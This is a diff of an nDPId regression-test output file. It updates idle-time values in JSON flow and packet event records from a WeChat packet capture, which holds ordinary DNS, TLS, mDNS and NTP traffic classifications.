-00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1600,"source":"wechat.pcap","alias":"nDPId-test","flow_id":89,"flow_packet_id":3,"flow_last_seen":1492171178268,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171178268,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0e6FAAEAGnZrAqAFny82Tq+NyAbsh7o58Fu1nsYARAOWzegAAAQEICgA\/UY1F3\/Tx"} 
+00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1600,"source":"wechat.pcap","alias":"nDPId-test","flow_id":89,"flow_packet_id":3,"flow_last_seen":1492171178268,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171178268,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0e6FAAEAGnZrAqAFny82Tq+NyAbsh7o58Fu1nsYARAOWzegAAAQEICgA\/UY1F3\/Tx"} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1603,"source":"wechat.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171178741,"flow_last_seen":1492171178741,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492171178741,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":56367,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1603,"source":"wechat.pcap","alias":"nDPId-test","flow_id":92,"flow_packet_id":1,"flow_last_seen":1492171178741,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1492171178741,"pkt":"8IQvSpdgeJKcD6iOCABFAABE+rRAAEARuz7AqAFnwKgB\/twvADUAMPgq0wUBAAABAAAAAAAAB3dlYnB1c2gDd2ViBndlY2hhdANjb20AAAEAAQ=="} 
00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1603,"source":"wechat.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171178741,"flow_last_seen":1492171178741,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492171178741,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":56367,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.WeChat","breed":"Fun","category":"Chat"},"dns": {"query":"webpush.web.wechat.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
@@ -574,7 +574,7 @@ 00520{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1639,"source":"wechat.pcap","alias":"nDPId-test","flow_id":99,"flow_packet_id":2,"flow_last_seen":1492171250302,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":102,"pkt_l4_len":48,"thread_ts_msec":1492171250302,"pkt":"MzMAAAD7eJKcD6iOht1gAAAAADARAf6AAAAAAAAAepKc\/\/4PqI7\/AgAAAAAAAAAAAAAAAAD7FOkU6QAwzvQAAAAAAAEAAAAAAAALX2dvb2dsZWNhc3QEX3RjcAVsb2NhbAAADAAB"} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1640,"source":"wechat.pcap","alias":"nDPId-test","flow_id":98,"flow_packet_id":3,"flow_last_seen":1492171251303,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1492171251303,"pkt":"AQBeAAD7eJKcD6iOCABFAABESy5AAAERi3DAqAFn4AAA+xTpFOkAMOiYAAAAAAABAAAAAAAAC19nb29nbGVjYXN0BF90Y3AFbG9jYWwAAAwAAQ=="} 00520{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1641,"source":"wechat.pcap","alias":"nDPId-test","flow_id":99,"flow_packet_id":3,"flow_last_seen":1492171251303,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":102,"pkt_l4_len":48,"thread_ts_msec":1492171251303,"pkt":"MzMAAAD7eJKcD6iOht1gAAAAADARAf6AAAAAAAAAepKc\/\/4PqI7\/AgAAAAAAAAAAAAAAAAD7FOkU6QAwzvQAAAAAAAEAAAAAAAALX2dvb2dsZWNhc3QEX3RjcAVsb2NhbAAADAAB"} 
-01072{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1644,"source":"wechat.pcap","alias":"nDPId-test","flow_id":86,"flow_packet_id":2,"flow_last_seen":1492171267294,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":506,"pkt_l4_len":472,"thread_ts_msec":1492171267294,"pkt":"8IQvSpdgeJKcD6iOCABFAAHsiFZAAEAGSOjAqAFn2DrNg+MfAbtA+v0gFZsbqIAZAT5FiAAAAQEICgA\/pcIy2r7tFwMDAVu+DrsMGADIBc3y\/EPKacgY\/\/yQnIvMDmcJvSRFqPEzGFHK1SfEZD+LW3zHqz7Qn57h7phszvLaMx08coFwWwqfC7HwO5byX8EfZX59ZxB8wie5NmTqPueQB2i63JLDDRRwIsZojgu7bb8cvUD8n10qxsHw\/TQ7hvwnvUlAMmevC0E4bShoN6nD161aFH8pJzOUZ6Inmm16pW110QaYPjjSQQTv7tNyG48jYK3I2RN01WazUewIpPm73LAS9ZABJ\/Ny8oNO\/paZaboPssOjLQcJQCoLWCEO29VIR1wHqlyW4rcdBB9JM36yEvABpD0B99LA+t3vBjUOLhPnYTS5Tg\/Xq\/y13A\/nE4U69mAQajAphd1rkHRmU5H71D9Yn3KgSrb0XGlqT0xKmBjYerOwAP2kk8Whxm\/8laMcKMQksDAjrijAvnUEJ5tIwpNFUcxgRKcVbexJ8LEa9dte0xcDAwAh3EhrcW9cp9\/WX9UiN8Kt\/CmhJWgGaSyh5LdY3zetl0V+FwMDAC1uKRpL0WFRctIQnQp7DT13au9uAW\/kc9Ado7SqH0KYC9BoecHEhGyhydVqz38="} 
+01072{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1644,"source":"wechat.pcap","alias":"nDPId-test","flow_id":86,"flow_packet_id":2,"flow_last_seen":1492171267294,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":506,"pkt_l4_len":472,"thread_ts_msec":1492171267294,"pkt":"8IQvSpdgeJKcD6iOCABFAAHsiFZAAEAGSOjAqAFn2DrNg+MfAbtA+v0gFZsbqIAZAT5FiAAAAQEICgA\/pcIy2r7tFwMDAVu+DrsMGADIBc3y\/EPKacgY\/\/yQnIvMDmcJvSRFqPEzGFHK1SfEZD+LW3zHqz7Qn57h7phszvLaMx08coFwWwqfC7HwO5byX8EfZX59ZxB8wie5NmTqPueQB2i63JLDDRRwIsZojgu7bb8cvUD8n10qxsHw\/TQ7hvwnvUlAMmevC0E4bShoN6nD161aFH8pJzOUZ6Inmm16pW110QaYPjjSQQTv7tNyG48jYK3I2RN01WazUewIpPm73LAS9ZABJ\/Ny8oNO\/paZaboPssOjLQcJQCoLWCEO29VIR1wHqlyW4rcdBB9JM36yEvABpD0B99LA+t3vBjUOLhPnYTS5Tg\/Xq\/y13A\/nE4U69mAQajAphd1rkHRmU5H71D9Yn3KgSrb0XGlqT0xKmBjYerOwAP2kk8Whxm\/8laMcKMQksDAjrijAvnUEJ5tIwpNFUcxgRKcVbexJ8LEa9dte0xcDAwAh3EhrcW9cp9\/WX9UiN8Kt\/CmhJWgGaSyh5LdY3zetl0V+FwMDAC1uKRpL0WFRctIQnQp7DT13au9uAW\/kc9Ado7SqH0KYC9BoecHEhGyhydVqz38="} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1645,"source":"wechat.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171267294,"flow_last_seen":1492171267294,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492171267294,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":45366,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1645,"source":"wechat.pcap","alias":"nDPId-test","flow_id":100,"flow_packet_id":1,"flow_last_seen":1492171267294,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1492171267294,"pkt":"8IQvSpdgeJKcD6iOCABFAABEJBJAAEARkeHAqAFnwKgB\/rE2ADUAMGKHk6IBAAABAAAAAAAAB3dlYnB1c2gDd2ViBndlY2hhdANjb20AAAEAAQ=="} 00775{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1645,"source":"wechat.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171267294,"flow_last_seen":1492171267294,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492171267294,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":45366,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.WeChat","breed":"Fun","category":"Chat"},"dns": {"query":"webpush.web.wechat.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
@@ -584,7 +584,7 @@ 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1651,"source":"wechat.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171268427,"flow_last_seen":1492171268427,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1492171268427,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":42074,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1651,"source":"wechat.pcap","alias":"nDPId-test","flow_id":102,"flow_packet_id":1,"flow_last_seen":1492171268427,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1492171268427,"pkt":"8IQvSpdgeJKcD6iOCABFAABBJl5AAEARj5jAqAFnwKgB\/qRaADUALSfRFz8BAAABAAAAAAAAA3NzbAdnc3RhdGljA2NvbQNsYW4AAAEAAQ=="} 00775{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1651,"source":"wechat.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171268427,"flow_last_seen":1492171268427,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1492171268427,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":42074,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"ssl.gstatic.com.lan","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
-01072{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1653,"source":"wechat.pcap","alias":"nDPId-test","flow_id":86,"flow_packet_id":3,"flow_last_seen":1492171268600,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":506,"pkt_l4_len":472,"thread_ts_msec":1492171268600,"pkt":"8IQvSpdgeJKcD6iOCABFAAHsiFdAAEAGSOfAqAFn2DrNg+MfAbtA+v0gFZsbqIAZAT5BhgAAAQEICgA\/qcQy2r7tFwMDAVu+DrsMGADIBc3y\/EPKacgY\/\/yQnIvMDmcJvSRFqPEzGFHK1SfEZD+LW3zHqz7Qn57h7phszvLaMx08coFwWwqfC7HwO5byX8EfZX59ZxB8wie5NmTqPueQB2i63JLDDRRwIsZojgu7bb8cvUD8n10qxsHw\/TQ7hvwnvUlAMmevC0E4bShoN6nD161aFH8pJzOUZ6Inmm16pW110QaYPjjSQQTv7tNyG48jYK3I2RN01WazUewIpPm73LAS9ZABJ\/Ny8oNO\/paZaboPssOjLQcJQCoLWCEO29VIR1wHqlyW4rcdBB9JM36yEvABpD0B99LA+t3vBjUOLhPnYTS5Tg\/Xq\/y13A\/nE4U69mAQajAphd1rkHRmU5H71D9Yn3KgSrb0XGlqT0xKmBjYerOwAP2kk8Whxm\/8laMcKMQksDAjrijAvnUEJ5tIwpNFUcxgRKcVbexJ8LEa9dte0xcDAwAh3EhrcW9cp9\/WX9UiN8Kt\/CmhJWgGaSyh5LdY3zetl0V+FwMDAC1uKRpL0WFRctIQnQp7DT13au9uAW\/kc9Ado7SqH0KYC9BoecHEhGyhydVqz38="} 
+01072{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1653,"source":"wechat.pcap","alias":"nDPId-test","flow_id":86,"flow_packet_id":3,"flow_last_seen":1492171268600,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":506,"pkt_l4_len":472,"thread_ts_msec":1492171268600,"pkt":"8IQvSpdgeJKcD6iOCABFAAHsiFdAAEAGSOfAqAFn2DrNg+MfAbtA+v0gFZsbqIAZAT5BhgAAAQEICgA\/qcQy2r7tFwMDAVu+DrsMGADIBc3y\/EPKacgY\/\/yQnIvMDmcJvSRFqPEzGFHK1SfEZD+LW3zHqz7Qn57h7phszvLaMx08coFwWwqfC7HwO5byX8EfZX59ZxB8wie5NmTqPueQB2i63JLDDRRwIsZojgu7bb8cvUD8n10qxsHw\/TQ7hvwnvUlAMmevC0E4bShoN6nD161aFH8pJzOUZ6Inmm16pW110QaYPjjSQQTv7tNyG48jYK3I2RN01WazUewIpPm73LAS9ZABJ\/Ny8oNO\/paZaboPssOjLQcJQCoLWCEO29VIR1wHqlyW4rcdBB9JM36yEvABpD0B99LA+t3vBjUOLhPnYTS5Tg\/Xq\/y13A\/nE4U69mAQajAphd1rkHRmU5H71D9Yn3KgSrb0XGlqT0xKmBjYerOwAP2kk8Whxm\/8laMcKMQksDAjrijAvnUEJ5tIwpNFUcxgRKcVbexJ8LEa9dte0xcDAwAh3EhrcW9cp9\/WX9UiN8Kt\/CmhJWgGaSyh5LdY3zetl0V+FwMDAC1uKRpL0WFRctIQnQp7DT13au9uAW\/kc9Ado7SqH0KYC9BoecHEhGyhydVqz38="} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1654,"source":"wechat.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171268754,"flow_last_seen":1492171268754,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1492171268754,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":43705,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1654,"source":"wechat.pcap","alias":"nDPId-test","flow_id":103,"flow_packet_id":1,"flow_last_seen":1492171268754,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1492171268754,"pkt":"8IQvSpdgeJKcD6iOCABFAABIJm1AAEARj4LAqAFnwKgB\/qq5ADUANAzJFXEBAAABAAAAAAAAB3dlYnB1c2gDd2ViBndlY2hhdANjb20DbGFuAAABAAE="} 00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1654,"source":"wechat.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171268754,"flow_last_seen":1492171268754,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1492171268754,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":43705,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"webpush.web.wechat.com.lan","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
@@ -615,38 +615,38 @@ 00777{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1669,"source":"wechat.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171290232,"flow_last_seen":1492171290232,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1492171290232,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":41759,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"2.debian.pool.ntp.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1670,"source":"wechat.pcap","alias":"nDPId-test","flow_id":109,"flow_packet_id":2,"flow_last_seen":1492171290232,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1492171290232,"pkt":"8IQvSpdgeJKcD6iOCABFAABDMalAAEARhEvAqAFnwKgB\/qMfADUAL1ZyUSMBAAABAAAAAAAAATIGZGViaWFuBHBvb2wDbnRwA29yZwAAHAAB"} 00786{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1670,"source":"wechat.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492171290232,"flow_last_seen":1492171290232,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":78,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1492171290232,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":41759,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"2.debian.pool.ntp.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1671,"source":"wechat.pcap","alias":"nDPId-test","flow_id":78,"flow_packet_id":2,"flow_last_seen":1492171290232,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171290232,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0Mx1AAEAGXPLAqAFnQOmnvNO9AbuA1BLzAh8CfoAQAT2IFAAAAQEICgA\/vqCGKY\/Q"} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1671,"source":"wechat.pcap","alias":"nDPId-test","flow_id":78,"flow_packet_id":2,"flow_last_seen":1492171290232,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171290232,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0Mx1AAEAGXPLAqAFnQOmnvNO9AbuA1BLzAh8CfoAQAT2IFAAAAQEICgA\/vqCGKY\/Q"} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171291761,"flow_last_seen":1492171291761,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":53515,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":110,"flow_packet_id":1,"flow_last_seen":1492171291761,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1492171291761,"pkt":"8IQvSpdgeJKcD6iOCABFAABIMrNAAEARgzzAqAFnwKgB\/tELADUANPxl\/4EBAAABAAAAAAAAB3dlYnB1c2gDd2ViBndlY2hhdANjb20DbGFuAAABAAE="} 00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171291761,"flow_last_seen":1492171291761,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":53515,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"webpush.web.wechat.com.lan","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171270418,"flow_last_seen":1492171270418,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":42589,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492171250302,"flow_last_seen":1492171253304,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492171291761,"l3_proto":"ip6","src_ip":"fe80::7a92:9cff:fe0f:a88e","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00654{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1492171175912,"flow_last_seen":1492171268600,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":440,"flow_tot_l4_payload_len":880,"flow_avg_l4_payload_len":293,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"216.58.205.131","src_port":58143,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} -00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1492171175912,"flow_last_seen":1492171268600,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":440,"flow_tot_l4_payload_len":880,"flow_avg_l4_payload_len":293,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"216.58.205.131","src_port":58143,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00654{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1492171175912,"flow_last_seen":1492171268600,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":440,"flow_tot_l4_payload_len":880,"flow_avg_l4_payload_len":293,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"216.58.205.131","src_port":58143,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1492171175912,"flow_last_seen":1492171268600,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":440,"flow_tot_l4_payload_len":880,"flow_avg_l4_payload_len":293,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"216.58.205.131","src_port":58143,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1492171169377,"flow_last_seen":1492171169377,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"193.204.114.233","src_port":37578,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"}} 
00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492171274388,"flow_last_seen":1492171274388,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":42856,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 